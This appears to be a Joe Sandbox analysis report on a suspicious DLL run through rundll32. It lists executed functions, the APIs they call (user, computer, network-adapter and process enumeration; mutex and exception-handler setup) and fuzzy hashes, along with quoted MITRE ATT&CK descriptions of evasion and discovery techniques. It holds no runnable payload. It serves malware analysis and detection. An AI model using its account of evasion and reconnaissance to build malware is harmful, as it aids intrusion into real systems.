Snapshot File: hcaresult_3_3_1cded240000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 688d1271b1d8b95b3a85d4d5a732f362afcd59f68a65b111751230eba3c8f70b
Instruction ID: 775974a665b1b906bf2367cbfbe1ab17e2b9904eb1fdb4fc62ea5be3d82d0f85
Opcode Fuzzy Hash: 688d1271b1d8b95b3a85d4d5a732f362afcd59f68a65b111751230eba3c8f70b
Instruction Fuzzy Hash: F001F93025A9170BF7A9B77D7880BE373C1F795310F548076D80ACB245DD26C8414292

Non-executed Functions

Function 000001CDED27BA3A Relevance: 3.1, Strings: 2, Instructions: 640COMMON

Download Yara Rule

Strings

, xrefs: 000001CDED27BD05
XVd, xrefs: 000001CDED27BDA0

Memory Dump Source

Source File: 00000003.00000003.1688223900.000001CDED240000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CDED240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_1cded240000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID: $XVd
API String ID: 1279760036-811571918
Opcode ID: f475fc55844db6e8131c602c2d339803e9576b42789618c8742c8cae5d8b7649
Instruction ID: f4d8d6fa90df67b4cdb72e50fe8d43e3bd116f6f8365ea3b82592b5a058204aa
Opcode Fuzzy Hash: f475fc55844db6e8131c602c2d339803e9576b42789618c8742c8cae5d8b7649
Instruction Fuzzy Hash: 71225D30618B488FE768DF2CD445BABB7E1FB98710F50462DE09AC7292DF35E8418B56

Function 00007FFE13301590 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 00007FFE133016AA

Strings

VirtualProtect failed with code 0x%x, xrefs: 00007FFE1330171C
Address %p has no image-section, xrefs: 00007FFE13301603, 00007FFE13301755
Mingw-w64 runtime failure:, xrefs: 00007FFE133015C8
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FFE13301741

Memory Dump Source

Source File: 00000003.00000002.4122907159.00007FFE13301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000003.00000002.4122892367.00007FFE13300000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4122944958.00007FFE13342000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4122968321.00007FFE13347000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffe13300000_rundll32.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 2312e9ff84ee54667947e5eeae78843df0f435bf47361401cdb874d59acbb16c
Instruction ID: 6a97d4bb491070e8594bb67ae03461a4cc9377e4ad45be089ed4600be237cd44
Opcode Fuzzy Hash: 2312e9ff84ee54667947e5eeae78843df0f435bf47361401cdb874d59acbb16c
Instruction Fuzzy Hash: 5A51B37AE05E068AEB109B52D8406AD37A0FF65BA4F484170DE2D677B4DF3CE445C348

Function 00007FFE13301010 Relevance: 6.1, APIs: 4, Instructions: 110
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FFE13301065
_amsg_exit.MSVCRT ref: 00007FFE1330108F

Memory Dump Source

Source File: 00000003.00000002.4122907159.00007FFE13301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000003.00000002.4122892367.00007FFE13300000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4122944958.00007FFE13342000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4122968321.00007FFE13347000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffe13300000_rundll32.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 4431f891fefb1190ea9beb5eab1e6e86d3abe6f1424f242ec69b093df556b819
Instruction ID: 5a986548a1b425f342362f088ad3628d05b693bfb8ad442a2e3f2891c1e00fd4
Opcode Fuzzy Hash: 4431f891fefb1190ea9beb5eab1e6e86d3abe6f1424f242ec69b093df556b819
Instruction Fuzzy Hash: B4415E39E08E4689F7698B17D95023E23A0BF687A8F0440B1DD6DA77B0DE3CE9419349

Analysis Process: rundll32.exePID: 7500, Parent PID: 7308COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.7%
Total number of Nodes:	488
Total number of Limit Nodes:	9

Executed Functions

Function 000001E8C87624C0 Relevance: 10.8, APIs: 7, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32 ref: 000001E8C8762552
GetComputerNameExW.KERNELBASE ref: 000001E8C8762567
GetComputerNameExW.KERNELBASE ref: 000001E8C8762596
GetTokenInformation.KERNELBASE ref: 000001E8C87625D2
GetNativeSystemInfo.KERNELBASE ref: 000001E8C8762684
GetAdaptersInfo.IPHLPAPI ref: 000001E8C8762770
GetAdaptersInfo.IPHLPAPI ref: 000001E8C87627B5

Memory Dump Source

Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd

Similarity

API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
String ID:
API String ID: 1596153048-0
Opcode ID: 4a85e9ad04f57a8671d90e2dd50e5492fee8be09ab17e15441e30e40a0fcfe5b
Instruction ID: 0aa0c1f941e3d51c4024b1f579bf372fff222eb4f75f4a968a106b2bfe763f33
Opcode Fuzzy Hash: 4a85e9ad04f57a8671d90e2dd50e5492fee8be09ab17e15441e30e40a0fcfe5b
Instruction Fuzzy Hash: FCA1C630238B448BEB54AB14D856BDEF3D2FB95310F50452DA84EC3296EE74F985CB92

Function 000001E8C875CAD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 198
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 000001E8C875CB27
Thread32First.KERNEL32 ref: 000001E8C875CB4C

Strings

0, xrefs: 000001E8C875CBA6

Memory Dump Source

Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd

Similarity

API ID: CreateFirstSnapshotThread32Toolhelp32
String ID: 0
API String ID: 490256885-4108050209
Opcode ID: 56b387516ff4cea3dc33e5ee412a7af7dd174eee44575f0d6583827be0e4a923
Instruction ID: 0cc593a39c1c534608afd16e3e84917c61f272ed4d84fe97a1a1ab3fcd793abe
Opcode Fuzzy Hash: 56b387516ff4cea3dc33e5ee412a7af7dd174eee44575f0d6583827be0e4a923
Instruction Fuzzy Hash: 88614F30268B884FE7A4EB19C456BEAF7D5FBC5310F50042DA98EC3291EF74A445C752

Function 000001E8C874D5C0 Relevance: 1.6, APIs: 1, Instructions: 114
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrGetProcedureAddress.NTDLL ref: 000001E8C874D692

Memory Dump Source

Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd

Similarity

API ID: AddressProcedure
String ID:
API String ID: 3653107232-0
Opcode ID: d22c461c21b557022e48e835735dce800b4ab793d7e9a5f7fefbb0348ab7f62c
Instruction ID: 186e3bb9c2cbe84842b8eb7d69a2f825d9b3a85c781b364e200736f4e4115d14
Opcode Fuzzy Hash: d22c461c21b557022e48e835735dce800b4ab793d7e9a5f7fefbb0348ab7f62c
Instruction Fuzzy Hash: 18318730168B484BD664AA48DC477EAF7E0FB87321F50055DE8CEC3251EA31B4858BD7

Function 000001E8C874A8B0 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAddVectoredExceptionHandler.NTDLL ref: 000001E8C874A8C9

Memory Dump Source

Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 0bd7b81864e542346ab8d1baffadf97f8142cdd5cb44a6247faf9dbe5d946671
Instruction ID: d64e3847971dcbc7fcf82244273000ddc3fbf6a46b1fd4e615fb8ed3bc9dd177
Opcode Fuzzy Hash: 0bd7b81864e542346ab8d1baffadf97f8142cdd5cb44a6247faf9dbe5d946671
Instruction Fuzzy Hash: B211EB316649A84FEF64B7E8D4CD3EDF2D5E7ED321F760635840ED3140E91998808B60

Function 000001E8C8747520 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 372
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 000001E8C87483A4

Memory Dump Source

Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 15bd43141e6e56d8e20dd615630e89a0b2474d540f4140bc4154d949e2d90d80
Instruction ID: 4a18779aaa9066c6df67ebdd782a5cefc80246a0ca169ec1eeccf5f6addc4330
Opcode Fuzzy Hash: 15bd43141e6e56d8e20dd615630e89a0b2474d540f4140bc4154d949e2d90d80
Instruction Fuzzy Hash: 78C18670224A488FE794EF2CD4557EAB7E1FB9A311F50051DE84EC32A6EE34E881CB55

Function 000001E8C8749500 Relevance: 1.9, APIs: 1, Instructions: 409
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExA.KERNEL32 ref: 000001E8C8749530

Memory Dump Source

Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 9c752627e803a0b5411fcc23f35c3cc0402ee579664005442f04e4099f09f16f
Instruction ID: 3d30883b87c265fecb4689486578b8532a063e219c4b98c65325c7a01f438c99
Opcode Fuzzy Hash: 9c752627e803a0b5411fcc23f35c3cc0402ee579664005442f04e4099f09f16f
Instruction Fuzzy Hash: 8BE13C71418A498FE755EF14E885AE6B7F4F769340F20027FE84AC3161EB38E285CB95

Function 000001E8C8754EDA Relevance: 1.6, APIs: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlRemoveVectoredExceptionHandler.NTDLL ref: 000001E8C8754F6A

Memory Dump Source

Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd

Similarity

API ID: ExceptionHandlerRemoveVectored
String ID:
API String ID: 1340492425-0
Opcode ID: 963e97afebf6d56f926804c9cb1fcf03c3557f60ee325544a439f7271aa4fe1e
Instruction ID: 887dcdcd1af46c0b1f178788ce2bd4dba36b14ca01341e861e5df1bbeddd47d1
Opcode Fuzzy Hash: 963e97afebf6d56f926804c9cb1fcf03c3557f60ee325544a439f7271aa4fe1e
Instruction Fuzzy Hash: 5211EB302689480BF35CA77CAC1B7FAB6C5E755321F60426EBC0EC35E2FE259C518591

Function 000001E8C8754EE0 Relevance: 1.6, APIs: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlRemoveVectoredExceptionHandler.NTDLL ref: 000001E8C8754F6A

Memory Dump Source

Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd

Similarity

API ID: ExceptionHandlerRemoveVectored
String ID:
API String ID: 1340492425-0
Opcode ID: a6ae613427cfb71fe0016fb1096c5eb202b7b235033781ae4efbe5c6132115d5
Instruction ID: 9618223124142958d1ad8a0ed0aa85c40abea67133c881f31ea67168a6e1caa3
Opcode Fuzzy Hash: a6ae613427cfb71fe0016fb1096c5eb202b7b235033781ae4efbe5c6132115d5
Instruction Fuzzy Hash: 0F11A7302689080BF35CAB7CAC1B7FAB2C5E755321F60422EBC0EC35E2FD65AC914191

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IMS64.dll.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Windows Analysis Report
IMS64.dll.dll

Function 00007FFE133025E0 Relevance: 1.4, Strings: 1, Instructions: 147
COMMON

Function 00007FFE13301590 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 120
COMMON

Function 00007FFE13301010 Relevance: 6.1, APIs: 4, Instructions: 110
sleepCOMMON

Function 000001E8C87624C0 Relevance: 10.8, APIs: 7, Instructions: 282
COMMON

Function 000001E8C875CAD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 198
processthreadCOMMON

Function 000001E8C874D5C0 Relevance: 1.6, APIs: 1, Instructions: 114
libraryloaderCOMMON

Function 000001E8C874A8B0 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Function 000001E8C8747520 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 372
COMMON

Function 000001E8C8749500 Relevance: 1.9, APIs: 1, Instructions: 409
synchronizationCOMMON

Function 000001E8C8754EDA Relevance: 1.6, APIs: 1, Instructions: 77
COMMON

Function 000001E8C8754EE0 Relevance: 1.6, APIs: 1, Instructions: 77
COMMON